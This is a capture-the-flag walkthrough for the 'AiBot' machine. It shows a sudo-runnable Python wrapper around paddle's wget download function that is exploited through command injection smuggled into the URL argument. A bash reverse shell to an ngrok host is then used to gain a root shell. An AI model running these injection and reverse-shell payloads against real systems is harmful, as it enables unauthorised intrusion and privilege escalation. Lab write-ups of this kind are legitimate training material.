AiBot

Challenges Difficulty: Medium
Category: Machines

WALKTHROUGH

This challenge is from Cybertalant 2025 ramadan nights CTF

First thing we got is a terminal with a user called ttyduser to list this user permissions use

sudo -l

ttyduser can run /usr/bin/python3 /opt/aiwget.py with sudo

import argparse
import re
from paddle import utils

def is_valid_url(url):
    regex = re.compile(
    r'^(?:http|ftp|https)s?://',
    re.IGNORECASE,
    )
    return re.match(regex, url) is not None

def is_valid_path(path):
    return path.startswith("/tmp")

def main():
    parser = argparse.ArgumentParser(description='Download AI Model.')
    parser.add_argument('url', type=str, help='URL to download from')
    parser.add_argument('path', type=str, help='Path to save the file, must start with /tmp')
    args parser.parse_args()
    if not is_valid_url(args.url):
        raise ValueError("The URL is not valid.")
    if not is_valid_path(args.path):
        raise ValueError("The path must start with /tmp.")
    utils.download._wget_download(args.url, args.path)

if __name__ == '__main__':
    main()

This script requires two arguments:

url: the link to the AI Model to download
path: path to save model to and must start with /tmp

Takes the arguments directly from the user and passes them to _wget_download function
we found a cve for utils.download._wget_download function

So we tried to do so

sudo /usr/bin/python3 /opt/aiwget.py "https://; sleep 10" /tmp/model

and it works so lets try to get a revere shell using ngrok

ngrok tcp 4444

sudo /usr/bin/python3 /opt/aiwget.py "https://; bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/14455 0>&1'" /tmp/model

AhmedZaid

Contact

AiBot

WALKTHROUGH